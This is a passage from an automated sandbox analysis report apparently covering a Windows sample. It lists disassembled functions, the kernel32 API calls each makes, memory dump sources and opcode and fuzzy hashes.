                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 493d87c015f04549534215ee96fb9a9919f8cc55fa74c89b18f99e225f24064a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A313675D0531C9BDB10EFA0D989BCCBBB8AF08304F1040AAE50CAB250EB759B89DF45
                                                                                                                                                                                                                                                                      Function 00FBD0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,8F6E4A30,?,00FF3D30,000000FF), ref: 00FBC657
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBC630: GetLastError.KERNEL32(?,00000000,00000000,8F6E4A30,?,00FF3D30,000000FF), ref: 00FBC661
                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,01008AF0), ref: 00FBD0D8
                                                                                                                                                                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,01008AF0), ref: 00FBD0E7
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FBD0E2
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                      • API String ID: 3511171328-631824599
                                                                                                                                                                                                                                                                      • Opcode ID: 0d0fb0d4dbae85c9cb1db704767dcb0804573598773bdfda28a8afa6ad2c488e
                                                                                                                                                                                                                                                                      • Instruction ID: 90f46b43f7f2f51dbd34147358d14720f8289d6d1e57f60a66b20a6340ab906b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d0fb0d4dbae85c9cb1db704767dcb0804573598773bdfda28a8afa6ad2c488e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9E092706087418FD330BF2AE804793BBE4AF04394F00885CE49AD2295FBB5D449EFA2
                                                                                                                                                                                                                                                                      Function 00FEE237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEE28B
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEE2D5
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEE39B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 661929714-0
                                                                                                                                                                                                                                                                      • Opcode ID: bf573f06beb65ac950ae1607e09f57a778cfd9cecddd307fd52914c4d20c898b
                                                                                                                                                                                                                                                                      • Instruction ID: 6e7fce877a54fd8bc4612048ce5249c93cbdd55e55d177209a70767a7f3c0020
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf573f06beb65ac950ae1607e09f57a778cfd9cecddd307fd52914c4d20c898b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43619F719002479FEB28DF26EC82BBA77A9EF08310F14417AE905C7285E778D994EB50
                                                                                                                                                                                                                                                                      Function 00FD6E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00FD6F13
                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FD6F1D
                                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00FD6F2A
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                      • Opcode ID: 380cde2fea34aa60cd789d87380324ab3b9233855ea9ec1a111136d640b4feb1
                                                                                                                                                                                                                                                                      • Instruction ID: 436a4af1dcef2da2643c13756284bd675ac8fde6ed408a13601e424ea310296e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 380cde2fea34aa60cd789d87380324ab3b9233855ea9ec1a111136d640b4feb1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E831D27490122CABCB21EF64DD8879DBBB9BF08310F5441EAE51CA7250E734AB85DF45
                                                                                                                                                                                                                                                                      Function 00FB45B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,8F6E4A30,00000001,00000000,?,00000000,00FF4460,000000FF,?,00FB474D,00FB3778,?,00000000,00000000,?), ref: 00FB45DB
                                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,00000000,00FF4460,000000FF,?,00FB474D,00FB3778,?,00000000,00000000,?,?,?,?,00FB3778), ref: 00FB45E6
                                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00FF4460,000000FF,?,00FB474D,00FB3778,?,00000000,00000000,?,?,?), ref: 00FB45F4
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2853612939-0
                                                                                                                                                                                                                                                                      • Opcode ID: b2920cc1b631e7ef2dbecc5dc6a9e565232302e6bcb904f3271462a4f470e9fa
                                                                                                                                                                                                                                                                      • Instruction ID: 112da3c15f499e8f66851b9a6e4a3f53cf489d53c22add597bb6dc14f17eaaa8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2920cc1b631e7ef2dbecc5dc6a9e565232302e6bcb904f3271462a4f470e9fa
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5511A732E046549BC7359F5AD944BB6F7ACEB85B25F00052AED15D3240EB35AC00DA90
                                                                                                                                                                                                                                                                      Function 00FDE270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                                                                                                                      • Instruction ID: 0609cc19b13da9a5a730febc8c1363aa527d1160d78842d007376a21c700fedc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F14071E002199FDF14DF68D9806ADB7B2FF98324F19826AE915EB380D731AD01DB90
                                                                                                                                                                                                                                                                      Function 00FE7B1F Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00FE7F64,00000000,00000000,00000000), ref: 00FE7E23
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InformationTimeZone
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 565725191-0
                                                                                                                                                                                                                                                                      • Opcode ID: ab59af066ee1b5407972acfc39dd5f0440874e4979137e69b9c89a9e31d802ff
                                                                                                                                                                                                                                                                      • Instruction ID: 0f12bb33b7e9e3b7cccd4048f1f39707982427832551a0578e8eebbd57ec1603
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab59af066ee1b5407972acfc39dd5f0440874e4979137e69b9c89a9e31d802ff
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01C13472D04355ABDB21BB66DC02ABEB7B9EF44720F244466F940EB285F7359E00E790
                                                                                                                                                                                                                                                                      Function 00FE84BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FE84B8,?,?,00000008,?,?,00FF14E4,00000000), ref: 00FE86EA
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                      • Opcode ID: 6e7433a816c3bb862fa42261b5f2f9cea9a328750ed66855179f3ec2e51cc971
                                                                                                                                                                                                                                                                      • Instruction ID: da487117134fda79e2b7a7682135833c659929852e790783f8fb9bb1d8a28bea
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e7433a816c3bb862fa42261b5f2f9cea9a328750ed66855179f3ec2e51cc971
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AB16C32610648CFD714DF29C486B647BA1FF453A4F298658E89ECF2A1CB35ED82DB40
                                                                                                                                                                                                                                                                      Function 00FD35A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FD35BF
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                      • Opcode ID: c50c54148f1959df08aae0639bb1ddd716d692e5edaa2aa75cbf3aad2f2a79ff
                                                                                                                                                                                                                                                                      • Instruction ID: aab2362d1c0d67ca7cff9c567f39e53fa9f374e9ec36f6898ab2724201c4f04e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c50c54148f1959df08aae0639bb1ddd716d692e5edaa2aa75cbf3aad2f2a79ff
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE51B2B1D142158BEB26CF98D481BA9BBF1FB04354F28816BD945EB344D379EA00DF61
                                                                                                                                                                                                                                                                      Function 00FEAF79 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 89afc03bb1bfe5b568300491dde5f69b95c86fe9d2f1bf5f1ff780807daf8dc0
                                                                                                                                                                                                                                                                      • Instruction ID: 571656679227bc2f145668347566de1f4c3c8d579c7fcf84a0705d4910744c69
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89afc03bb1bfe5b568300491dde5f69b95c86fe9d2f1bf5f1ff780807daf8dc0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7231D97290025DAFCB20DFA9CC85DBBB76DEB84320F144199F91597244EA35ED409B90
                                                                                                                                                                                                                                                                      Function 00FEE48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEE4DE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                      • Opcode ID: 2611d23852f548a38625821d18148102fe20731a5ababc418022c94c9230c3f6
                                                                                                                                                                                                                                                                      • Instruction ID: 1f7d3ce80fbd831faf08ce0c528628f531f7a9995cc18fb5a3afac5055d00e0b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2611d23852f548a38625821d18148102fe20731a5ababc418022c94c9230c3f6
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F219572A14346ABDB28AF26EC41A7A73ADEF44728F18007AF906C6141FB78DD04E751
                                                                                                                                                                                                                                                                      Function 00FEE111 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00FEE237,00000001,00000000,?,-00000050,?,00FEE868,00000000,?,?,?,00000055,?), ref: 00FEE183
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                      • Opcode ID: 039f5ed843fea259e057bb677bcd515c2e1438a55803d05458936d3ba7e3782e
                                                                                                                                                                                                                                                                      • Instruction ID: 4b257e0f2e7e34de62578de8e4c41ce049cafc17855d8b3c191ebeb48ace15d7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 039f5ed843fea259e057bb677bcd515c2e1438a55803d05458936d3ba7e3782e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB114C3B6007059FDB189F3ADC915BAB796FF84728B19442CE54647B40E375B943DB40
                                                                                                                                                                                                                                                                      Function 00FEE6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00FEE453,00000000,00000000,?), ref: 00FEE6E5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                      • Opcode ID: 59634203324f4c24d658731446846b0b42e489cb07b7ef9ce3e0020e5fbfee3b
                                                                                                                                                                                                                                                                      • Instruction ID: da110de826c8140e08d4e61113e447d85e163bc2503cd83c8914422068569502
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59634203324f4c24d658731446846b0b42e489cb07b7ef9ce3e0020e5fbfee3b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F02D36E00256BBDB285B62DC05BBA7758EB40764F140425ED25A3180EA34FD01E690
                                                                                                                                                                                                                                                                      Function 00FEE1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00FEE48A,00000001,?,?,-00000050,?,00FEE82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00FEE1F6
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2417226690-0
